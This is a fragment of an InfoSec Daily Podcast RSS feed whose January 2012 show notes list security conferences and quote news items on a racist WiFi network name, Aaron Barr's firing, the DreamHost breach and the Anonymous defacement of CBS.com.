	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://news.cnet.com/8301-31921_3-57364330-281/judge-americans-can-be-forced-to-decrypt-their-laptops/
Judge Robert Blackburn ordered a Peyton, Colo., woman to decrypt the hard drive of a Toshiba laptop computer no later than February 21&#8211;or face the consequences including contempt of court.

	Blackburn, a George W. Bush appointee, ruled that the Fifth Amendment posed no barrier to his decryption order. The Fifth Amendment says that nobody may be &#34;compelled in any criminal case to be a witness against himself,&#34; which has become known as the right to avoid self-incr[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 575 &#8211; Racist Router, Aaron Gets Axed, G+ Required, Dreamhost’s Nightmare, CBS &amp; Hannibal</title>
		<link>http://www.isdpodcast.com/episode-575-racist-router-aaron-gets-axed-g-required-dreamhosts-nightmare-cbs-hannibal</link>
		<comments>http://www.isdpodcast.com/episode-575-racist-router-aaron-gets-axed-g-required-dreamhosts-nightmare-cbs-hannibal#comments</comments>
		<pubDate>Tue, 24 Jan 2012 02:10:04 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3408</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 575 for January 23, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 575 for January 23, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.nydailynews.com/news/national/wifi-signal-racist-anti-semitic-slur-teaneck-nj-sparks-police-probe-signal-rec-center-router-article-1.1008135</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bigot named their WiFi signal &ldquo;F&#8212; All Jews and N&#8212;-&rdquo; &mdash; and now cops are investigating.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hateful signal I.D. popped up on the iPhone of a 28-year-old mom inside a Teaneck, N.J. recreation center, where her 3-year-old daughter was attending dance class.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The offending signal was coming from a router connected in the Richard Rodda Community Center in the the township, located 10 miles outside New York City.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.huffingtonpost.com/2012/01/20/aaron-barr-cybersecurity-anonymous-occupy-wall-street_n_1219328.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.huffingtonpost.com/2012/01/20/aaron-barr-cybersecurity-anonymous-occupy-wall-street_n_1219328.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Just last week Aaron Barr, the former HBGary Federal CEO whose email was hacked by Anonymous in February, was &quot;schooling&quot; the FBI on security and social media. Now he&#39;s been let go from his new job at another federal contractor, Sayres and Associates. His former boss at Sayres told HuffPost it was because Barr was acting like a &quot;cowboy&quot; on the company dime.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Barr&#39;s strange year in the public eye began in early 2011. At the time he was the CEO at HBGary Federal, an information security contractor working with both federal government agencies and with outside firms. In a Feb. 4 article, he claimed to the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Financial Times</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that he was on the cusp of exposing the leaders behind the loose-knit confederation of hackers and activists known as Anonymous.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Anons struck back, releasing thousands of internal emails from HBGary Federal &#8212; emails that showed that HBGary Federal was working for a law firm, which was in turn working for the U.S. Chamber of Commerce, to hurt Wikileaks by feeding it false information and discrediting its supporters in the media.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techcrunch.com/2012/01/20/new-google-accounts-require-gmail-and-g-accounts/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2012/01/20/new-google-accounts-require-gmail-and-g-accounts/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google appears to have made some changes to its account creation process. Whereas before, all it took was an email address of any kind and some basic demographic data, now you are required to create both a Gmail account and a presence on Google+. This doesn&rsquo;t strike me as a user-friendly change.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On one hand, it&rsquo;s harmless in a way: you create a throwaway email address and a dummy G+ account if you don&rsquo;t want to use them. Problem solved. But is that really a step people should have to take if they just want to use Google Docs or YouTube? Certainly Google will say that this is all about the integration of services, but part of the attraction of Google services has always been how you can just use one or the other. This forced-signup device smells of an attempt to boost G+ numbers, and is reminiscent not of the Google of yore, but of the Apple and Facebook of today.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://techcrunch.com/2012/01/20/dreamhost-hacked-password-changes-made-mandatory/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2012/01/20/dreamhost-hacked-password-changes-made-mandatory/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another day, another hack. The company whose data was compromised this time? DreamHost.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to DreamHost&rsquo;s status blog, the company detected &ldquo;unauthorized activity within one of [their] databases&rdquo;. In other words: someone was snooping around where they shouldn&rsquo;t have been snooping, and DreamHost noticed the foot prints.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Alas, the company isn&rsquo;t divulging much information as to the nature of the hack, beyond that they &ldquo;don&rsquo;t have evidence that customer passwords were taken at this time&rdquo;. Still, they&rsquo;re requiring password resets for all Shell/FTP accounts (read: not the account that DreamHost customers use to login to the billing/backend system, but the user accounts they use to access and maintain their actual websites.) for what seems to be </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">all</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> DreamHost customers. If you find yourself having trouble logging into your DreamHost FTP accounts today, it&rsquo;s because your password has already been disabled.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.nationaljournal.com/tech/hackers-claim-responsibility-for-temporarily-felling-cbs-com-after-attacking-doj-site-20120122?mrefid=related2"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nationaljournal.com/tech/hackers-claim-responsibility-for-temporarily-felling-cbs-com-after-attacking-doj-site-20120122?mrefid=related2</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A group of hackers temporarily wiped clean CBS.com, in what seemed to be further retaliation for the government shutdown last week of file-sharing site Megaupload.com. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Several Twitter accounts linked to Anonymous, a loosely organized collective of hackers, posted messages claiming responsibility for the hack, some of them </span><a href="https://twitter.com/#%21/AnonNewsSEC/status/161143476602417152"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">mentioning</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &quot;#OpMegaUpload,&quot; shorthand for Operation Mega Upload. At least one suggested Fox would be targeted next.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group claimed responsibility for hacking the Justice Department&#39;s website earlier in the week after federal officials shut down Megaupload.com.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For a short period, visitors to CBS.com were presented with a single blank HTML file around mid-day on Sunday. The site has since been restored.</span></p>
